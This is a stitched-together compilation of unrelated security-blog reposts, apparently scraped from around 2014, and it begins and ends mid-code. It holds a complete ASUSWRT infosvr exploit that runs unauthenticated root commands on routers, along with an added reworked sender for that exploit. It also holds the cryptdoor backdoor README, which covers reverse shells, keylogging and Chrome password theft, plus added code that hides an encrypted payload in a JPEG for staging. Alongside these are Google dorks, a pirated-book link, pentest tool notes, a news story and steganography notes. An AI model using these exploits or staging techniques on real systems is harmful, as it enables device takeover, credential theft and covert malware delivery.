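  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0C69 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 100 0 0 10 0
   2: 0100007F:A1B2 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 12347 1 0000000000000000 20 4 30 10 -1
"""

def make_demo_dir():
    """Constructed stand-in for an infected /bin: 'ls' is the shell wrapper
    and the real binary sits under the look-alike name 'l' + U+0455."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "ls"), "wb") as fh:
        fh.write("#!/bin/sh\nl\u0455 $*|grep -vE \"[\u0455-\u0578]|grep|177\"\n".encode())
    for name in ("l\u0455", "cat"):
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9)
    return d

if __name__ == "__main__":
    demo = make_demo_dir()
    print("look-alike names:", non_ascii_names(demo))
    print("script wrappers :", script_wrappers(demo))
    print("listening ports :", listening_ports(PROC_NET_TCP_SAMPLE))
```

Run the first two checks over every directory on PATH; the /proc trick from the post is caught separately by bind-mounting / elsewhere (`mount --bind / /mnt`) and listing /mnt/proc, since the files live on the root filesystem underneath the mount.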
-
#!/usr/bin/env python3
# Exploit Title: ASUSWRT 3.0.0.4.376_1071 LAN Backdoor Command Execution
# Date: 2014-10-11
# Vendor Homepage: http://www.asus.com/
# Software Link: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/FW_RT_N66U_30043762524.zip
# Source code: http://dlcdnet.asus.com/pub/ASUS/wireless/RT-N66U_B1/GPL_RT_N66U_30043762524.zip
# Tested Version: 3.0.0.4.376_1071-g8696125
# Tested Device: RT-N66U
# Description:
# A service called "infosvr" listens on port 9999 on the LAN bridge.
# Normally this service is used for device discovery using the
# "ASUS Wireless Router Device Discovery Utility", but this service contains a
# feature that allows an unauthenticated user on the LAN to execute commands
# <= 237 bytes as root. Source code is in asuswrt/release/src/router/infosvr.
# "iboxcom.h" is in asuswrt/release/src/router/shared.
#
# Affected devices may also include wireless repeaters and other networking
# products, especially the ones which have "Device Discovery" in their features
# list.
#
# Using broadcast address as the IP address should work and execute the command
# on all devices in the network segment, but only receiving one response is
# supported by this script.

import sys, os, socket, struct

PORT = 9999

if len(sys.argv) < 3:
    print('Usage: ' + sys.argv[0] + ' <ip> <command>', file=sys.stderr)
    sys.exit(1)

ip = sys.argv[1]
cmd = sys.argv[2]
enccmd = cmd.encode()

if len(enccmd) > 237:
    # Strings longer than 237 bytes cause the buffer to overflow and possibly crash the server.
    print('Values over 237 will give rise to undefined behaviour.', file=sys.stderr)
    sys.exit(1)

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('0.0.0.0', PORT))
sock.settimeout(2)

# Request consists of following things
# ServiceID   [byte]     ; NET_SERVICE_ID_IBOX_INFO
# PacketType  [byte]     ; NET_PACKET_TYPE_CMD
# OpCode      [word]     ; NET_CMD_ID_MANU_CMD
# Info        [dword]    ; Comment: "Or Transaction ID"
# MacAddress  [byte[6]]  ; Double-wrongly "checked" with memcpy instead of memcmp
# Password    [byte[32]] ; Not checked at all
# Length      [word]
# Command     [byte[420]] ; 420 bytes in struct, 256 - 19 unusable in code = 237 usable

packet = (b'\x0C\x15\x33\x00' + os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(enccmd)) + enccmd).ljust(512, b'\x00')
sock.sendto(packet, (ip, PORT))

# Response consists of following things
# ServiceID   [byte]     ; NET_SERVICE_ID_IBOX_INFO
# PacketType  [byte]     ; NET_PACKET_TYPE_RES
# OpCode      [word]     ; NET_CMD_ID_MANU_CMD
# Info        [dword]    ; Equal to Info of request
# MacAddress  [byte[6]]  ; Filled in for us
# Length      [word]
# Result      [byte[420]] ; Actually returns that amount

while True:
    data, addr = sock.recvfrom(512)
    # 22 == NET_PACKET_TYPE_RES; skip our own broadcast echo and discovery replies
    if len(data) == 512 and data[1] == 22:
        break

length = struct.unpack('<H', data[14:16])[0]
s = slice(16, 16+length)
# print only the `length` result bytes, not the whole 512-byte datagram
sys.stdout.buffer.write(data[s])
sock.close()

# milw00rm.com [2015-01-04]

Source
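The packet layouts in the exploit's comments are easy to get wrong by one offset, so here is an added Python 3 example (not part of the exploit above) that builds the request and decodes the response as named functions, with a constructed reply so the round trip can be checked offline. The constant names follow the comments; `fake_response` models what the exploit says infosvr returns and is not captured from a device.

```python
import os
import struct

INFOSVR_PORT = 9999
SERVICE_ID_IBOX_INFO = 0x0C
PACKET_TYPE_CMD = 0x15
PACKET_TYPE_RES = 0x16
OPCODE_MANU_CMD = 0x33
MAX_CMD = 237            # 256 - 19 usable bytes, per the exploit's comment
PACKET_SIZE = 512

def build_request(cmd, txn_id=None):
    """The 512-byte NET_CMD_ID_MANU_CMD request: service id, packet type,
    little-endian opcode, 4-byte transaction id, 6-byte MAC and 32-byte
    password (both left zero; the service does not check them), LE length,
    then the command, zero-padded to 512 bytes."""
    enc = cmd.encode() if isinstance(cmd, str) else cmd
    if len(enc) > MAX_CMD:
        raise ValueError(f"command is {len(enc)} bytes; max is {MAX_CMD}")
    if txn_id is None:
        txn_id = os.urandom(4)
    header = struct.pack("<BBH", SERVICE_ID_IBOX_INFO, PACKET_TYPE_CMD, OPCODE_MANU_CMD)
    body = header + txn_id + b"\x00" * 6 + b"\x00" * 32 + struct.pack("<H", len(enc)) + enc
    return body.ljust(PACKET_SIZE, b"\x00")

def parse_response(data, expected_txn=None):
    """Return (mac, result_bytes). Checks the packet type and, when given,
    the echoed transaction id, so our own broadcast echo or an unrelated
    discovery reply on the same port is not taken for the result."""
    if len(data) != PACKET_SIZE:
        raise ValueError("unexpected packet size")
    service, ptype, opcode = struct.unpack_from("<BBH", data, 0)
    if (service, ptype, opcode) != (SERVICE_ID_IBOX_INFO, PACKET_TYPE_RES, OPCODE_MANU_CMD):
        raise ValueError("not a MANU_CMD response")
    txn = data[4:8]
    if expected_txn is not None and txn != expected_txn:
        raise ValueError("transaction id mismatch")
    mac = data[8:14]
    length = struct.unpack_from("<H", data, 14)[0]
    return mac, data[16:16 + length]

def fake_response(request, result, mac=b"\x00\x11\x22\x33\x44\x55"):
    """Constructed reply for offline testing, laid out as the exploit's
    response comment describes: the transaction id is echoed back."""
    txn = request[4:8]
    header = struct.pack("<BBH", SERVICE_ID_IBOX_INFO, PACKET_TYPE_RES, OPCODE_MANU_CMD)
    body = header + txn + mac + struct.pack("<H", len(result)) + result
    return body.ljust(PACKET_SIZE, b"\x00")

def send_command(ip, cmd, timeout=2.0):
    """Live use: send one command and wait for the reply carrying our
    transaction id (the service answers to port 9999, so we bind it)."""
    import socket
    txn = os.urandom(4)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(("0.0.0.0", INFOSVR_PORT))
    sock.settimeout(timeout)
    try:
        sock.sendto(build_request(cmd, txn), (ip, INFOSVR_PORT))
        while True:
            data, _ = sock.recvfrom(PACKET_SIZE)
            try:
                return parse_response(data, txn)
            except ValueError:
                continue      # our own echo or an unrelated packet; keep waiting
    finally:
        sock.close()

if __name__ == "__main__":
    req = build_request("id", b"\x01\x02\x03\x04")
    mac, out = parse_response(fake_response(req, b"uid=0(admin) gid=0\n"), b"\x01\x02\x03\x04")
    print(mac.hex(":"), out.decode())
```

Matching on the transaction id is what makes a broadcast scan usable: with `sock.bind` on 9999 the sender receives its own datagram and every router's discovery traffic on that port, and only replies echoing our 4 bytes are ours.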
-
DESCRIPTION

Esearchy is a small library capable of searching the internet for email addresses. Currently, the supported search methods are (but are not limited to):

Search engines:
Google
Bing
Yahoo
AltaVista

Social engines:
LinkedIn
Google Profiles (based on DigiNinja's idea, gpscan)
Naymz
Classmates
Spoke

Other engines:
PGP servers
Usenets
GoogleGroups
Search Spider
LDAP

But searches do not stop there; ESearchy also looks for emails inside:
PDF, DOC, DOCX, XLSX, PPTX, ODT, ODP, ODS, ODB, ASN, TXT

Once all the text within the file is parsed, the emails are added to the list of found accounts.

In order to parse Microsoft Word (.doc) you either need a Windows platform with Word installed, or Antiword (a free MS Word document reader) installed; if neither is on the OS, we perform a raw search inside the file.

NOTE: THIS IS STILL BEING DEVELOPED. CODE IS SUBMITTED DAILY, SO BE AWARE THAT CODE MIGHT NOT WORK PROPERLY ALL THE TIME. IF SOMETHING GOES WRONG PLEASE RAISE AN ISSUE.

SUPPORT:
github.com/FreedomCoder/esearchy/issues
Emails from github.

SYNOPSIS:
For now, there are two main ways of performing a search:
Executable CLI command: esearchy -h
Library: for those who want to integrate this into their application, you can use it in “the ruby way”

REQUIREMENTS:
ruby 1.8 or 1.9
cgi
pdf/reader
json
spidr
ldap
rubyzip (migrating to FreedomCoder-rubyzip 0.9.2 so it's 1.9 compatible)

INSTALL:
> sudo gem sources -a gems.github.com (if you do not have the repository)
> sudo gem install gemcutter
> sudo gem install esearchy

Download
https://github.com/carnal0wnage/esearchy-ng.git

Source
-
cryptdoor

AES encrypted python backdoor that communicates only over AES encrypted traffic. The shell has the ability to spawn a meterpreter reverse_tcp into memory using VirtualAlloc (taken from Veil-Evasion). We can also download and upload files over the secure AES encrypted connection. Keylogging is implemented for Windows using pyHook. All traffic, apart from the traffic meterpreter makes, is encrypted with AES. On top of this all of the imports are randomized, and the script is encrypted with AES and decrypts itself in memory at runtime (taken from pyherion).

Staged payload

The main body of backdoor code is hosted at a URL and downloaded at runtime by the backdoor.py stub. This means that the actual backdoor code only exists in the victim's memory. The backdoor payload can be hosted on tempsend.com or at a custom URL and downloaded and exec'ed at runtime by the backdoor.py script. The code will be hidden in a jpg that remains valid so it can be viewed. The key for decrypting the payload code is kept in the downloader, so if anyone finds it online, they will not be able to decrypt it.

Usage

usage: ./cryptdoor.py [options]

optional arguments:
  -h, --help            show this help message and exit
  -i HOSTNAME, --hostname HOSTNAME
                        Ip or hostname to connect back to.
  -p PORT, --port PORT  Port to connect back to.
  -e EXPIRE, --expire EXPIRE
                        Payload Life: h=hour, d=day, w=week, m=month
  -u CUSTOMURL, --customurl CUSTOMURL
                        Host the generated jpg at this url.
  -f CUSTOMIMAGE, --customimage CUSTOMIMAGE
                        Backdoor this jpg instead of a random choice from stubs/images.
  -a, --persistence     Enable Auto-persistence.
  -b BACKDOORNAME, --backdoorname BACKDOORNAME
                        Name of backdoor (default backdoor.py).
  -s SERVERNAME, --servername SERVERNAME
                        Name of server (default server.py).

cryptdoor.py will make the backdoor and server. The simplest syntax is:

./cryptdoor.py -i host -p port -e d

You can add -a to attempt automatic persistence:

./cryptdoor.py -i host -p port -e d -a

Use your own jpg as the backdoor:

./cryptdoor.py -i host -p port -e d -f lol.jpg

Host the produced jpg at a custom URL instead of uploading to tempsend:

./cryptdoor.py -i host -p port -u http://myddns.us.to/cat.jpg

host and port refer to the host and port of the listening server (attacker).

These are the options you have from within the shell:

AES-shell options:
download file       - Download a file from remote pwd to localhost.
upload filepath     - Upload a filepath to remote pwd.
run commands        - Run a command in the background.
wget url            - Download a file from url to remote pwd.
tempsend file       - Upload a file from remote pwd to tempsend.com

Windows Only:
persistence         - Install exe as a system service backdoor.
unpersist           - Remove persistence and exit.
meterpreter ip:port - Execute a reverse_tcp meterpreter to ip:port.
keyscan             - Start recording keystrokes.
keydump             - Dump recorded keystrokes.
keyclear            - Clear the keystroke buffer.
chromepass          - Retrieve chrome stored passwords.
bypassuac cmds      - Run commands as admin.
proxyupdate file    - Update proxy list from file.

Compilation

The backdoor script can be compiled to a standalone PE executable using pyinstaller on Windows.

Install python27: https://www.python.org/ftp/python/2.7.8/python-2.7.8.msi
Run this script to install pip: https://bootstrap.pypa.io/get-pip.py
Press Windows Key+Pause, then "Advanced system settings", then "Environment Variables".
You may or may not have a "PATH" variable listed there; if not, add one and write "C:\Python27;C:\Python27\Scripts". If you already have one, just add a semicolon before appending this to the variable, like: "C:\oldpath;C:\Python27;C:\Python27\Scripts"
Open a new cmd terminal and you should be able to:

pip install pyinstaller pycrypto requests

Add ';C:\Python27\Lib\site-packages\PyInstaller' to the end of your PATH variable.
Install pyHook: Download pyHook from SourceForge.net
Install pywin32: Python for Windows Extensions - Browse /pywin32 at SourceForge.net
Place the socks.py file in the same directory as backdoor.py if you want to use a proxy.
Open a new cmd terminal and cd to wherever backdoor.py is.

pyinstaller -F -w backdoor.py

That's it, enjoy your exe in dist.

Advanced Compilation

You can compile the exe with optimized python files with:

python -O C:\Python27\Scripts\pyinstaller-script.py -F -w backdoor.py

If you want to UPX pack the final exe to decrease the final size, include tools/upx.exe in the same directory as backdoor.py when you compile with pyinstaller.

Proxies

NOTE: Proxying is temporarily disabled. Will be back soon.

If you wish to have your backdoor connect back to you through a HTTP/s proxy, there are a few things we have to do:

Edit the stubs/backdoor.py script at lines 310-311 and fill in the values for the proxy details.
Get a DDNS pointed at your IP (proxying will not work without one).
Then generate your backdoor with the -x switch and replace the IP with your DDNS hostname:

./cryptdoor.py -i DDNS -p port -x

HTTP proxying is achieved using: https://github.com/Anorov/PySocks

Obfuscation

Obfuscation of the backdoor source code is achieved using: https://github.com/astrand/pyobfuscate

Download
https://github.com/d4rkcat/cryptdoor.git

Source
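The staged-payload section says the code is hidden in a jpg that stays viewable and that only the downloader holds the key. The following is an added Python 3 example, not cryptdoor's own code, of the carrier side of that: the sealed blob is appended after the carrier's EOI marker (decoders stop there, so the image still renders) with a 4-byte length trailer so the stub can find the blob even when the ciphertext happens to contain the bytes FF D9. Because it must run with the standard library only, the cipher is a SHA-256 counter keystream plus an HMAC tag, which is a stand-in for the AES cryptdoor uses and not a recommendation; the minimal JPEG carrier is constructed for the example.

```python
import hashlib
import hmac
import os

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
NONCE_LEN, TAG_LEN, LEN_FIELD = 16, 32, 4

def _keystream(key, nonce, length):
    """SHA-256 counter keystream: standard-library stand-in for AES so the
    example runs without extra packages. Not a substitute for a real cipher."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])

def _xor(data, stream):
    return bytes(a ^ b for a, b in zip(data, stream))

def seal(key, plaintext):
    """nonce || ciphertext || HMAC-SHA256 tag. The tag lets the stub refuse a
    blob that was modified while hosted instead of exec'ing garbage."""
    nonce = os.urandom(NONCE_LEN)
    ct = _xor(plaintext, _keystream(key, nonce, len(plaintext)))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return nonce + ct + tag

def open_sealed(key, blob):
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    expect = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expect):
        raise ValueError("authentication failed (wrong key or modified blob)")
    return _xor(ct, _keystream(key, nonce, len(ct)))

def embed(jpeg, key, payload):
    """Append the sealed payload after the carrier's last EOI marker, then a
    big-endian 4-byte blob length. Anything already trailing the EOI is dropped."""
    end = jpeg.rfind(EOI)
    if not jpeg.startswith(SOI) or end < 0:
        raise ValueError("carrier is not a JPEG")
    blob = seal(key, payload)
    return jpeg[:end + 2] + blob + len(blob).to_bytes(LEN_FIELD, "big")

def extract(stego, key):
    """Read the length trailer, slice the blob, and check an EOI precedes it
    before decrypting. Searching for FF D9 instead would be ambiguous."""
    n = int.from_bytes(stego[-LEN_FIELD:], "big")
    start = len(stego) - LEN_FIELD - n
    if n < NONCE_LEN + TAG_LEN or start < 2 or stego[start - 2:start] != EOI:
        raise ValueError("no payload trailer")
    return open_sealed(key, stego[start:len(stego) - LEN_FIELD])

# Constructed header-only carrier (SOI, APP0/JFIF segment, EOI): structurally
# a JPEG, not a real photo.
MINIMAL_JPEG = SOI + b"\xff\xe0\x00\x10JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00" + EOI

if __name__ == "__main__":
    key = os.urandom(32)           # would live only in the downloader stub
    stego = embed(MINIMAL_JPEG, key, b"print('payload running')\n")
    print(len(stego), "bytes; recovered:", extract(stego, key))
```

Image viewers and most upload pipelines keep the trailing bytes, but any service that re-encodes images (thumbnailing, EXIF stripping) discards them, which is why the stub should fail closed on a missing or unauthenticated trailer rather than exec whatever it got.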
-
Black Hat Python, Python Programming for Hackers & Pentesters (Dec 2014)

''Python is the language of choice for hackers and security analysts for creating powerful and effective tools. Ever wonder how they do it? A follow-up to the perennial best-seller Gray Hat Python, Justin Seitz's Black Hat Python explores the darker side of Python's capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, extending the popular web hacking tool Burp Suite, and more. You'll learn how to:

Create a trojan command-and-control using Github.
Detect sandboxing and automate common malware tasks, like keylogging and screenshots.
Escalate Windows privileges with creative process control.
Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine.
Abuse Windows COM automation to perform a man-in-the-browser attack.
Exfiltrate data from a network most sneakily.

Insider techniques and creative challenges show you how to extend the hacks, and are sure to make Black Hat Python irresistible to anyone interested in offensive security.''

Download: https://www.sendspace.com/file/tggtkv

Source
-
New tools released 2014.

Whatsfree
https://github.com/commonexploits/whatsfree
Useful when conducting pentests. Quickly find a live IP address to use. This can be handy when the client says “just pick one that is free” or when they give you a spreadsheet with an IP address to use and you want to ensure it is really free. Quite often typos will occur and you could take out a live box if you set the wrong IP. You do not need to set any IP address on your interface, just run it and it will list what IPs are free in the local subnet you enter.

Livehosts
https://github.com/commonexploits/livehosts
This is a cut-down version of the LazyMap script I released. It will scan the given local or remote subnet and discover and count which hosts are live. Works very quickly just using some NMAP switches, lists and counts them. Handy for input into Nessus and also to work out how populated the VLANs are. During a pentest typically you will be given a spreadsheet with a list of VLANs and the expected number of hosts. I always run this and then make a note of how many hosts were actually there. For example, you expect to see 4 hosts and you see 40; this could impact the schedule, so it is worth alerting people at an early stage.

Sonijohn
https://github.com/commonexploits/sonijohn
Something I created on the spot during a review of some Sonicwall firewalls. I wanted to check the password strength for the users. Sonicwall firewall configs export as a base64 file. You just point this script at the exported config file; it will decode it and extract all usernames and password hashes. It then rearranges them in a way that makes them compatible with the John the Ripper password cracker. So just run John at them and it will work.

Junijohn
https://github.com/commonexploits/junijohn
Much like the Sonicwall script, this is the same thing for Juniper firewalls.

DTPscan
https://github.com/commonexploits/dtpscan
This is a PASSIVE VLAN hopping script. I have updated and fixed this, as a recent change to the way tshark outputs a summary broke this script. This will sniff a network port (no IP address needed) and look for DTP packets. If it finds DTP it will work out what mode it is in, tell you, and indicate if it thinks VLAN hopping will be possible. Then you could run something like Frogger to carry out an ACTIVE attack to hop VLANs. A lot of clients now want to know “can you VLAN hop”; this will tell you within 90 seconds if you can or not.

WinocPHC (Windows Offline Password Hash Checker)
https://github.com/commonexploits/winocphc
Simply point it at any password hashes extracted from Windows operating systems with tools such as FGDump, pwdump, gsecdump etc. It will look through and highlight any user accounts that have the same password set and list the users. It also checks and separates disabled or previously used passwords. This is useful if you have extracted domain hashes and find that half the users have the same password; this is likely to indicate an issue in the user creation process where the user is not being forced to change the password at first login. It is also good for highlighting password history issues: if the user can keep setting the same password, it will list that too.

LazyMap
https://github.com/commonexploits/port-scan-automation
Useful for any kind of internal infrastructure testing/VA. This will discover the live hosts, then port scan with NMAP just the live hosts. It then lists all the unique open ports and creates a Nessus policy for you. Then you just import the Nessus policy (which contains just the open ports found) and paste in the live hosts. This will be a much faster and more accurate test as it is only scanning the live hosts and open ports. Also records start/stop times etc. Outputs all findings into client folders and auto-excludes your own IP address. How many people Nessus the complete range where their tester laptops are and do not exclude them?

IPGen
https://github.com/commonexploits/port-scan-automation
A very simple script to generate IP address lists. Just give it a range and any IP addresses to exclude (see above, you want to exclude yourself and any other testers) and it will spit out a list of IP addresses. Then just paste these into Nessus etc.

wEAPe
https://github.com/commonexploits/weape
A wireless network tool for testing managed wireless networks using 802.1x (PEAP/LEAP etc). It will associate against the AP, wait, and extract any hostnames or domain usernames from the traffic as they authenticate to the wireless network. You do not need the wireless key/cert to do this.

Frogger
https://github.com/commonexploits/vlan-hopping
An ACTIVE VLAN hopping tool. This will abuse the DTP protocol and imitate a trunk port. It will then extract any VLAN information from the switch and allow you to hop onto the other VLANs.

Av0id
https://github.com/nccgroup/metasploitavevasion
Handy little script to create Metasploit payloads to shell boxes running various Anti-Virus programs. Unfortunately this has been submitted to online scanners such as VirusTotal, which share info with AV vendors, so it doesn't work too well now and gets flagged!

EasyDA
https://github.com/nccgroup/easyda
A great tool for any Windows based infrastructure test. Insert a Windows password hash or clear text password and a range of IPs. It will look for common password reuse within the network. It will also track down and look for where the Domain Administrator account is logged in. If common passwords exist and you find where the DA is, it's game over. You are the domain admin, just impersonate the token and job done.

Cisc0wn
https://github.com/nccgroup/cisco-SNMP-enumeration
Cisco SNMP enumeration, brute force, config downloader and password cracking script. Automate SNMP community checking, information extraction and configuration downloads from Cisco devices.

Source
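The WinocPHC description above (same password set on several accounts, found from dumped hashes) comes down to grouping pwdump-format lines by NT hash, which works because NT hashes are unsalted. The following is an added Python 3 example, not WinocPHC's code, that does that grouping over a constructed pwdump/fgdump-style dump and also flags two related findings a reviewer wants from the same data: accounts still carrying a real LM hash, and accounts whose NT hash is that of the empty password. The sample users and hashes are made up for the example.

```python
from collections import defaultdict

# Well-known hashes of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

def parse_pwdump(text):
    """Parse 'user:rid:LMhash:NThash:::' lines (pwdump/fgdump/gsecdump
    style) into (user, rid, lm, nt) tuples with lower-cased hashes.
    Blank and malformed lines are skipped rather than aborting the run."""
    records = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(nt) != 32:
            continue
        records.append((user, rid, lm, nt))
    return records

def shared_passwords(records):
    """NT hash -> sorted users sharing it, for hashes used by more than one
    account. Identical NT hash means identical password (no salt)."""
    by_hash = defaultdict(list)
    for user, _, _, nt in records:
        by_hash[nt].append(user)
    return {nt: sorted(users) for nt, users in by_hash.items() if len(users) > 1}

def lm_hash_present(records):
    """Accounts still storing a real LM hash (cracked far faster than NT)."""
    return sorted(u for u, _, lm, _ in records if lm and lm != EMPTY_LM)

def empty_password(records):
    return sorted(u for u, _, _, nt in records if nt == EMPTY_NT)

def report(text):
    records = parse_pwdump(text)
    return {
        "shared": shared_passwords(records),
        "lm_present": lm_hash_present(records),
        "empty_password": empty_password(records),
    }

# Constructed dump; the one malformed line models the noise tools leave behind.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
jsmith:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
mjones:1106:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1107:e52cac67419a9a224a3b108f3fa6cb6d:5f4dcc3b5aa765d61d8327deb882cf99:::
akhan:1108:aad3b435b51404eeaad3b435b51404ee:c5a237b7e9d8e708d8436b6148a25fa1:::
Completed dump of 6 accounts.
"""

if __name__ == "__main__":
    for nt, users in report(SAMPLE_DUMP)["shared"].items():
        print(f"{nt}: {', '.join(users)}")
```

Three accounts sharing the Administrator's hash is the "never changed the initial password" pattern the post describes; the LM finding is worth reporting on its own because it means LM storage is still enabled on that host.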
-
The Sony Pictures Entertainment hack that started at the end of last month has so far caused severe damage to its reputation as well as its resources, from an internal system shutdown to the leak of upcoming movies and scripts. Now, a similar cyber attack against casino operator Las Vegas Sands Corp has been revealed, one that occurred in February 2014.

The cyber attack occurred in February of this year, but the details of the damage to the casino were not publicized until Bloomberg Businessweek exposed it in a story on Thursday. Hackers crippled thousands of servers and computers across the network of the giant Las Vegas Sands Corp. by wiping them with highly destructive malware.

The attack was believed to be in response to a statement given by the chief executive officer and largest shareholder of Las Vegas Sands Corp., Sheldon Adelson. In October 2013, the billionaire made a statement at the Manhattan campus of Yeshiva University that Iran should be bombed to get the country to abandon its nuclear program. This statement by Adelson circulated all over the Internet and reached Iran’s Supreme Leader Ayatollah Ali Khamenei, who responded two weeks later and said that the American government should "slap these prating people in the mouth and crush their mouths".

Two months later, the attackers hit the Las Vegas Sands IT network to destroy the corporation, and continued their attacks last January on the company’s virtual private network gateway at its slots casino in Bethlehem, Pennsylvania. The attack got worse in February, when hackers breached a server for the casino’s website and used an open tool to fetch usernames and passwords. Finally, they found the credentials of a senior systems engineer who had visited the Bethlehem site from Las Vegas, which gave them the keys to the corporate castle. The attackers wiped out data on computers and servers and erased hard drives as malware ripped through the company’s networks.

Hackers posted personal information about Sands Bethlehem employees, stolen email addresses and social security numbers. They also left personal messages for Adelson: "Encouraging the use of Weapons of Mass Destruction, UNDER ANY CONDITION, is a Crime, signed, the Anti WMD Team," said one. "Damn A, Don’t let your tongue cut your throat," warned another.

The virus was written in Visual Basic, which is a common desktop programming language. Visual Basic malware has been used in the past, with the limitation that it only runs on Windows systems.

A spokesperson for cybersecurity firm Dell SecureWorks, which was brought in to clean up the damage caused to the company and determine its actual cause, declined to comment on the issue, citing company policy not to discuss work done for a customer. The company spokesman Ron Reese also declined to comment on the details provided in the report published by Bloomberg, saying, "I'm not going to confirm anything that was speculated or written in the Bloomberg story."

Via http://thehackernews.com/2014/12/las-vegas-casino-hacked.html
-
google dork:

intitle:contor trafic web
intitle:trafic web service
intitle:statistici trafic web

Under 'Search tools', select Romania as the country. Good luck!
-
What is Pixelknot? Pixelknot is an Android application that allows users to hide short text-based messages in photographs and share them across trusted channels. Pixelknot is now available on the Google Play store, Amazon appstore, and also on our website and verifiable via the asc.

What is Steganography? The practice of embedding secret messages into a piece of media so that no one, apart from the sender and intended recipient, knows that the secret message exists. The newly developed algorithm F5 withstands visual and statistical attacks, yet it still offers a large steganographic capacity. F5 implements matrix encoding to improve the efficiency of embedding. Thus it reduces the number of necessary changes. F5 employs permutative straddling to uniformly spread out the changes over the whole steganogram.

The Guardian steganography standard: we are working towards ensuring that the secret message in an image must:
Have the original image appear, to the trained human eye, unedited.
Have the bytes of the image appear, to a trained analyst, not distorted so much as to arouse suspicion.
Have the complete message be recoverable no matter how it is transmitted.

Features
Have a secret that you want to share? Why not hide it in a picture? With Pixelknot, only your friends with the secret password can unlock your special message. Everyone else just sees a pretty picture. It's a fun and easy way to share hidden messages without anyone knowing. Take those pixels, twist them in a knot, and see for yourself!
DISGUISE YOUR MESSAGES: Pictures are public, the text is hidden inside. Even a trained eye will think the image is unedited. It's security through obscurity!
FOR YOUR EYES ONLY: Put a password on the secret message to make sure that no one can read it except the person it's meant for.
EASY IMAGE CHOOSER: You can use the camera to take photos, or just use photos you've already taken.
INVISIBLE CHANGES: Even a trained analyst shouldn't be able to detect any message. The image bytes should seem undistorted.
SHARE ACROSS PLATFORMS: Want to share the images over email, file sharing tools (like Dropbox & Sparkleshare), social media (like Google+ & Flickr) or directly through Bluetooth or NFC? Not a problem! The messages are still recoverable on the other side. We'll have even more tools (like Facebook) working soon, so stay tuned!
AD-FREE: We want your love, not your money.
MATHEMATICALLY SECURE: We use the newly developed steganography algorithm F5 which implements matrix encoding to improve the efficiency of embedding and employs permutative straddling to uniformly spread out the changes over the whole steganogram.
ATTACK RESISTANT: We've launched attacks on images with messages hidden in them using a specialized version of stegdetect, an automated tool for detecting steganographic content in images. In most cases, the pictures have been impervious to attack. We will be including detection in an upcoming version of the application so you can easily test it yourself!
ARTIST FRIENDLY: The app features the work of Pablo Picasso. His painting "Girl before a Mirror" from March 1932, to be exact. We hope it inspires you to share beautiful imagery and wonderful ideas.
WE SPEAK YOUR LANGUAGE: Or at least we try to. Don't see your language? Join us and help translate the app: https://www.transifex.com/projects/p/pixelknot/
Download: https://guardianproject.info/wp-content/uploads/2013/04/pixelknot-qr1.png
Source: https://guardianproject.info/apps/pixelknot/
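The post mentions F5's matrix encoding but not how it cuts the number of changes. The following is an added illustration, not Pixelknot's or the F5 reference code: k message bits are embedded into n = 2**k - 1 carrier bits by flipping at most one of them, and extraction reads the same syndrome back. It assumes a plain list of bits as the carrier (standing in for coefficient LSBs) and leaves out F5's shrinkage handling and permutative straddling.

```python
# F5-style matrix encoding (1, n, k): k message bits per n = 2**k - 1 carrier
# bits, changing at most one. Illustration only; JPEG shrinkage is not handled.
from typing import List, Tuple

def syndrome(block: List[int]) -> int:
    """XOR of the 1-based positions of every carrier bit that is 1."""
    s = 0
    for i, bit in enumerate(block, start=1):
        if bit:
            s ^= i
    return s

def embed_block(block: List[int], msg: int) -> List[int]:
    """Copy of block whose syndrome equals msg; flips at most one bit."""
    out = list(block)
    pos = syndrome(out) ^ msg  # 1..n = bit to flip, 0 = block already matches
    if pos:
        out[pos - 1] ^= 1
    return out

def embed(carrier: List[int], message: bytes, k: int) -> Tuple[List[int], int]:
    """Embed message k bits per block of n = 2**k - 1 carrier bits.
    Returns (stego carrier, number of carrier bits actually changed)."""
    n = (1 << k) - 1
    bits = [(b >> (7 - j)) & 1 for b in message for j in range(8)]
    bits += [0] * (-len(bits) % k)  # pad to whole k-bit chunks
    if len(bits) // k * n > len(carrier):
        raise ValueError("carrier too small for message")
    stego = list(carrier)
    for c, start in enumerate(range(0, len(bits), k)):
        msg = int("".join(map(str, bits[start:start + k])), 2)
        stego[c * n:(c + 1) * n] = embed_block(stego[c * n:(c + 1) * n], msg)
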